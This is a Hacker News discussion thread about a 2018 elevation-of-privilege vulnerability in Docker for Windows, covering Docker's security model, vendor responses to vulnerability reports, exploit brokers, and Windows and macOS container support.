Hacker News new | past | comments | ask | show | jobs | submit login
You can't contain me: elevation-of-privilege vulnerability in Docker for Windows (srcincite.io)
144 points by ingve on Sept 6, 2018 | hide | past | favorite | 46 comments



On Linux, at least, being able to access the docker daemon (i.e. being in the docket group) is essentially equivalent to being root, in that there are trivial ways to become root if you can start an arbitrary container (e.g. bind-mounting / into a container).

So, it’s perhaps unclear how this exploit is significantly worse. Yes, you get access to SYSTEM, but Docker’s permission model appears to be predominantly “if you can control Docker then you own the machine”. Is this not the case on Windows?


The difference as I understand it is documentation. For Linux, the Docker docs make it abundantly clear what the security model is - don’t give access to the daemon socket to anyone you don’t trust to be root.

For Windows on the other hand there seems to be no official documentation on the topic. Instead some “unofficial” documentation has popped up to fill the void, making insecure recommendations in the process. This then becomes Docker’s problem.

I think it’s a good general lesson for documenting a platform: in the end you are responsible not only for what you explain to your users, but also for what they explain to each other. This can be frustrating because it makes you responsible for something you cannot control, like Docker couldn’t control the recommendations on that github thread. But you are still on the hook for addressing it - in this case probably by filling the gap in official documentation.


> This can be frustrating because it makes you responsible for something you cannot control

If bad recommendations are a product of bad/non-existent documentation then that very much is something you can control and a direct consequence of that neglect.

If docker couldn't be bothered the blame should not be with the bad recommendations.


If you can control Docker, you can do what Docker does. But Docker doesn’t need to be able to do everything (as long as you’re sure that you’ll never need to run a container that needs to do those things.) Specifically, you can run the Docker daemon itself under any combination of cgroup+namespace restrictions (i.e. “in a container”, though not usually in the sense of running Docker in Docker.)


> you can run the Docker daemon itself under any combination of cgroup+namespace restrictions

Not really though. The docker daemon needs access to the mount call, so it either must be root or root within its namespace.

It's incredibly difficult to remove any meaningful permissions from the docker daemon.

This is true to run any container, not just one that has bindmounts.

The docker daemon was not built to be anything but root, and running it as "docker in docker" only works with "--privileged", which is to say, with no security restrictions.


Sadly, many docker images you might want to try fail when run under Docker running in a unprivileged container.


> Docker at first denied a vulnerability existed at all, but later patched it on July 19th. After further discussions, they assigned CVE-2018-15514 on the 18th August.

It’s frustrating that this is the default reaction. I know why it occurs, at least from a human psychological standpoint, but it’s still frustrating. I’ve reported vulnerabilities without response, only to find them thanklessly fixed later. Without reply. But most of the time, my notifications are ignored. It becomes depressing very quickly.


Something similar happened to me with Amazon a while back. Found some vulns, and they fixed them but never publicly acknowledged them - because they said "the cloud is always patched", so no need to tell anyone- which I thought was an odd response.


Same for the RocketChat developers: https://github.com/RocketChat/Rocket.Chat/pull/10793

"We do not disclose security fixes as soon we have them fixed to prevent bad guys to exploit them."

"as soon we have" means never.

They believe bad guys would not monitor the commits of target products.


Not disclosing in release change logs potentially increase the chance of people being affected.

If I see a changelog with XSS fixed I will update a product straight away, if I don't - I might leave it a week or two until I have time.


I had a similar experience a few years back with Google (specifically the Android security team). Eager to get the issue fixed, but not in public disclosure or acknowledgement.


Are there possible legal consequences to acknowledging such a report, though? Maybe it's not just psychological, but a CYA move.


Generally no, there is minimal liability attached to acknowledging a report. There may be internal political issues and definitely external media ones, though.

Nobody wants to be the person who says "We're vulnerable, but I don't care enough to fix it". That's how you get internal political battles. Denial solves that problem.

When dealing with external reports, it means ammunition for dealing with third parties. "We are not aware of any such vulnerabilities" becomes a defensible position, as does telling reporters that you dispute the claims of vulnerability. Those buy time to maybe fix something.

And, well, there's the CYA psychology too. Nobody wants to confront the idea that they, or their smart and hard-working coworkers, screwed up to the point of creating a significant vulnerability.


It's unlikely. Many companies handle this sort of thing every day and don't deny the issue, just delay confirmation. It's more likely that someone within Docker decided that they didn't believe the report, but didn't bother to investigate properly before responding.


Personally I've been turned off by Docker the company on numerous occasions. (Still love docker the project)

Are there any inroads to a truly open source implementation of Docker for Mac and Windows? (Though I assume running a Linux VM would suffice?) It seems unfortunate that the default is running a non-open binary.


What is that about?

    - 2018-04-03 - Verified existing and sent to iDefense’s VCP
    - 2018-04-04 - Validated and acquired by iDefense
Is there a company that buys information about bugs ahead of time so they can protect their clients?

(a cursory Internet search didn't answer my question)


Is there a company that buys information about bugs ahead of time so they can protect their clients?

Companies like Zerodium act as brokers for 0-day exploits, but they tend to sell only to government agencies and the like.

https://zerodium.com/about.html


Gee. Is that really ethical?

Presumably their customers don't intend to patch the bugs without help from the vendor. They likely intend to exploit the bugs (in the name of state surveillance). Many/most global governments (all?) aren't trustworthy in this regard. If you disclose a bug to Zerodium, can you trust them not to have "bad" governments as customers? Also, consider a Sybil attack: Zerodium is an untrustworthy government front.

> ZERODIUM customers are mainly government organizations in need of specific and tailored cybersecurity capabilities, as well as major corporations from defense, technology, and financial sectors, in need of protective solutions to defend against zero-day attacks.

shrug, okay, I hope that's the case.


And iDefense is doing something similar?


They are more "security alerts as a service":

https://searchsecurity.techtarget.com/feature/VeriSign-iDefe...


[flagged]


Linux I could understand but not MacOS. Of the three major desktop platforms, it's the only one without native containerization support...


I think this is because Apple has no ambitions to make MacOS a dominant server operating system for internet based services.

In fact, I am not fond of the rather popular trend to brew ported versions of tools from Linux into MacOS to develop applications that will actually be deployed on Linux, so I am glad containerisation mitigates some of this problem and that MacOS makes you do it in a VM running Linux. Linux, being a Unix-like operating system is an internet server operating first, the most dominant one too, and a desktop operating system second. However, Linux distributions for servers and desktops are designed and managed very differently, that's why things like Docker was invented to reduce the issues with these differences.

Windows, on the other hand, is a desktop operating first, office productivity tools server second but they have also attempted to make their operating system dominant for all other servers and devices at the exclusion of everything else. They have not really succeeded at this, and containerisation and the cloud has made it even harder, hence why they have to both try to wedge Docker into Windows as a tick box exercise but also try to make it appear to work natively.


I'm not sure I'd agree with the characterization that Windows container support is a "tick box" excercise. I've followed the efforts of the team working on it, and it seems to me like they've put in a lot of work over a number of years to make this work in a Windows environment.



Not really missing anything, it's just that on macOS you actually need a vm to run docker. Docker for mac uses HyperKit VM and starts docker containers inside it.

It's mostly the same on windows (you needed hyper-v or virtualbox to run docker) but they are making efforts to run containers natively. Not sure how far they got with that.

In the end if you want the best performance with minimum resource usage you need a Linux OS


There's a support for Windows containers in Docker, but it's probably not useful for majority of users, because most of docker images are based on Linux, so you'll need to run Linux VM for practical usage. I think, WSL might make it possible to run Linux-based images natively, but I didn't hear about it yet.


The Linux containers on windows in WSL, I've heard, works in the latest insider builds to at least some degree, but haven't tried it to confirm.

There are a reasonable number of Windows container images on Docker hub, although nothing like the volume of linux ones.


Windows native containers are running on top of Hyper-V.


Windows server containers are not necessarily run inside hyper-v: https://docs.microsoft.com/en-us/virtualization/windowsconta...


My bad. Looks like they've implemented Linux namespaces from scratch (described nicely here [0])

[0] http://www.solidalm.com/2017/03/06/deep-dive-into-windows-se...


To clarify, my understanding is that on Windows you will always need a VM to run Linux containers, but there will be (is?) native Windows containers.

The dream is that maybe one day WSL will fully support Linux containers without a vm, but I will be amazed if they can pull that off.


Well, if you think about it, they already have containers on Windows - the WSL is effectively a container for each distro install.

Emulating Linux-level container APIs is also possible in principle.


It isn't really containerized, the same way Wine on Linux isn't. There is no isolation.


I have yet to bother with WSL as I am perfectly fine with Windows standard tooling, but it is built on top of Drawbridge, so it certainly has isolation in place.


Yep there is experimental support for native windows containers. (Not sure it it's still experimental as things move really fast in this space)

As I remember you couldn't have windows and linux containers running at the same time so you needed to flip a switch in the docker config to chose one.

I general I'm a linux guy but it would be really cool if they can get to a point in which you can run both windows and linux containers at the same time.


You can get Windows containers without VMs on Windows server 2016.

the WSL with Linux containers apparently does work with the latest insider builds...


Windows containers work on Windows server 2016 with Job object based isolation (No VM needed). They also support Windows and Linux containers (via LCoW) using hyper-v VMs.


That's a bit surprising considering how many web developers use osx & docker


It has nothing to do with popularity; a Linux container needs a Linux kernel. (Similarly if you run Windows containers, you'll need a VM on Linux) (if there was ever a reason for MacOS containers, then it'd probably be native)


Please don't start flamewars.


Video games. You forgot video games.


>Windows is for Office tools and watching movies.

And how do you suggest I run Visual Studio and WPF applications on mac or linux?


I guess, in that case you're not using docker.


I think chrisper was pointing out the snideness of the idea that Windows can't be used for development.


Windows VM


But then I am developing in Windows again anyways.




Consider applying for YC's first-ever Fall batch! Applications are open till Aug 27.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: